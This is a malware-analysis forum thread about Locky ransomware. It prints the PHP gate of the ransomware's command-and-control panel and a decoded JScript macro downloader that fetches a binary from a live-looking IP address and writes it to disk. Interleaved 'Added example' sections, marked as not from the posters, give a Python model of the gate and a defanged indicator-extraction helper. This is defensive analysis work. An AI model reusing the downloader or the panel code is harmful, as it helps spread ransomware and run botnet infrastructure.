A forum for reverse engineering, OS internals and malware analysis 

 #27891  by maddog4012
 Wed Feb 17, 2016 7:42 pm
this malware is dropped from a word doc that arrives in E-mail
 #27893  by benkow_
 Thu Feb 18, 2016 8:49 am
Not really useful, but for a few minutes the panel server had some problem and we were able to download PHP files.
gates: (main.php)
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

// Bots must POST; anything else gets the same 404 as an unknown action.
if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
// Raw request body: the bot traffic is encrypted, so it is not form-encoded on the wire.
if (!($data = @file_get_contents('php://input'))) exit_error(404);
// Decrypt the body (decrypt_bot_request() is defined in functions.php, not shown here)
// and parse the resulting query string straight into $_POST.
parse_str(decrypt_bot_request($data), $_POST);
// A bot id and an action name are both mandatory.
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/* Commented-out debug logging of the decrypted parameters:
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

// Dispatch: basename() keeps only the last path component, so "../x" becomes "x";
// the handler must exist as actions/<act>.php or the request 404s.
$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>
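Added example, not code from the post and not the panel's own code: a Python model of the request path in the main.php gate above, to reason about what a bot must send and which "act" values can reach the actions/ directory. decrypt_bot_request() is not on the page, so a single-byte XOR stand-in is assumed purely so the flow runs; ACTIONS_DIR and KNOWN_ACTIONS are likewise assumptions that stand in for the real install path and for file_exists().

```python
# Added example: a model of the Locky panel gate (main.php) request path.
# decrypt_bot_request() is NOT the real scheme; the XOR below is an assumption.
import posixpath
from urllib.parse import parse_qs

ACTIONS_DIR = "/var/www/panel/actions"          # assumed install path
KNOWN_ACTIONS = {"getkey", "report", "stats"}   # assumed handler names (stand-in for file_exists)
XOR_KEY = b"\x2a"                               # assumed key for the stand-in cipher


def decrypt_bot_request(data: bytes, key: bytes = XOR_KEY) -> str:
    """Stand-in for the panel's decrypt_bot_request(): single-byte XOR, then latin-1."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode("latin-1")


def encrypt_bot_request(text: str, key: bytes = XOR_KEY) -> bytes:
    """Inverse of the stand-in, used to build bot-style request bodies."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(text.encode("latin-1")))


def php_basename(path: str) -> str:
    """PHP basename() on a Unix host: drop trailing '/', keep the last component.
    Only '/' is a separator there, so a backslash does not split the name."""
    path = path.rstrip("/")
    return path.rsplit("/", 1)[-1]


def php_empty(value) -> bool:
    """PHP empty() for string inputs: unset, '' and '0' all count as empty."""
    return value is None or value == "" or value == "0"


def gate(method: str, body: bytes, actions_present=KNOWN_ACTIONS):
    """Model main.php: return (status, handler_path); 404 mirrors exit_error(404)."""
    if method != "POST" or not body:
        return 404, None
    # parse_str() writes into $_POST; with duplicate keys the last value wins.
    params = parse_qs(decrypt_bot_request(body), keep_blank_values=True)
    post = {k: v[-1] for k, v in params.items()}
    if php_empty(post.get("id")) or php_empty(post.get("act")):
        return 404, None
    # trim(basename($_POST['act'])) . '.php' inside actions/
    name = php_basename(post["act"]).strip(" \t\n\r\0\x0b")
    if name not in actions_present:             # stands in for @file_exists($script)
        return 404, None
    return 200, posixpath.join(ACTIONS_DIR, name + ".php")


if __name__ == "__main__":
    for act in ("report", "../../settings", "../report/", "0"):
        print(act, "->", gate("POST", encrypt_bot_request("id=1&act=" + act)))
```

Two things the model makes visible: basename() neutralises traversal in "act" but is not an allow-list, so any file that happens to sit in actions/ is reachable by name; and because empty("0") is true in PHP, a bot id or action of "0" is rejected exactly like a missing one, and a GET or a garbage body is indistinguishable from an unknown action from the outside.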
 #27897  by eli
 Thu Feb 18, 2016 12:43 pm
Seems like it stopped working. Servers taken down?
 #27924  by frank_boldewin
 Tue Feb 23, 2016 4:23 pm
eli wrote:Seems like it stopped working. Servers taken down?
maddog4012's doc file starts a macro with some obfuscated VB code and decodes to the following code:
// Decoded downloader (JScript syntax): fetch a URL with MSXML2 and write the raw
// response body to disk through an ADODB.Stream opened in binary mode.
function downloadToFile(url,file)
{
	var xhr=new ActiveXObject("msxml2.xmlhttp");
	ado=new ActiveXObject("ADODB.Stream");   // assigned to an undeclared global
	xhr.open("GET",url,false);               // synchronous request
	xhr.send();
	if(xhr.status===200)
	{
		ado.type=1;                           // adTypeBinary
		ado.open();
		ado.write(xhr.responseBody);
		ado.saveToFile(file);                 // drop the payload at the path in 'file'
		ado.close();
		return xhr.responseBody; 
	}
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);
The executable can still be downloaded.
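Added example, not from frank_boldewin's post: a small triage helper that scans decoded macro output for the MSXML2.XMLHTTP plus ADODB.Stream download-and-save pattern shown above and pulls the URLs out as defanged IOCs. SAMPLE_SCRIPT is a copy of the decoded code quoted in the post; BENIGN_SCRIPT is a constructed negative control; the ProgID lists are the ones an analyst would expect from script downloaders, not something taken from the sample.

```python
# Added example: triage of decoded macro output for the download-to-file pattern.
import re

# Copy of the decoded downloader quoted in the post above.
SAMPLE_SCRIPT = r'''
function downloadToFile(url,file)
{
    var xhr=new ActiveXObject("msxml2.xmlhttp");
    ado=new ActiveXObject("ADODB.Stream");
    xhr.open("GET",url,false);
    xhr.send();
    if(xhr.status===200)
    {
        ado.type=1;
        ado.open();
        ado.write(xhr.responseBody);
        ado.saveToFile(file);
        ado.close();
        return xhr.responseBody;
    }
}
downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);
'''

# Constructed negative control: a script that uses COM but does not download anything.
BENIGN_SCRIPT = 'var fso = new ActiveXObject("Scripting.FileSystemObject");\nfso.FolderExists("C:\\\\temp");'

ACTIVEX_RE = re.compile(r'ActiveXObject\(\s*["\']([^"\']+)["\']\s*\)', re.I)
URL_RE = re.compile(r'https?://[^\s"\'(),<>]+', re.I)
SAVE_RE = re.compile(r'\.saveToFile\s*\(', re.I)

# ProgIDs commonly used by script downloaders (lower-cased for comparison); assumed list.
HTTP_OBJECTS = {"msxml2.xmlhttp", "msxml2.serverxmlhttp", "microsoft.xmlhttp",
                "winhttp.winhttprequest.5.1"}
STREAM_OBJECTS = {"adodb.stream"}


def defang(url: str) -> str:
    """Rewrite to hxxp://host[.]tld/... so the IOC cannot be clicked by accident."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.lower().replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path


def extract_downloader_iocs(script: str) -> dict:
    """Return the COM objects, URLs and a verdict for the fetch + binary stream + save pattern."""
    objects = sorted({m.group(1).lower() for m in ACTIVEX_RE.finditer(script)})
    urls = URL_RE.findall(script)
    has_http = any(o in HTTP_OBJECTS for o in objects)
    has_stream = any(o in STREAM_OBJECTS for o in objects)
    return {
        "com_objects": objects,
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        # all three pieces together: HTTP fetch, ADODB stream, write to disk
        "downloader": has_http and has_stream and SAVE_RE.search(script) is not None,
    }


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, extract_downloader_iocs(text))
```

The verdict deliberately requires all three pieces (an HTTP ProgID, ADODB.Stream and saveToFile) so that ordinary scripts that merely instantiate a COM object are not flagged; the URL list is reported separately because it is useful even when the pattern is not complete.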
 #27931  by frank_boldewin
 Wed Feb 24, 2016 2:14 pm
Just in case anyone is interested: attached is an unpacked version of Locky.
 #27934  by w0rm
 Wed Feb 24, 2016 5:38 pm
There seems to be a version with a new DGA but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)
 #27939  by FafZee
 Thu Feb 25, 2016 8:37 am
Unpacked in attachment
 #27950  by p1nk
 Fri Feb 26, 2016 7:12 am
benkow_ wrote: Not really useful, but for a few minutes the panel server had some problem and we were able to download PHP files.
gates: (main.php)
[main.php gate quoted in full above]

Do you have an archive of all the collected PHP pages?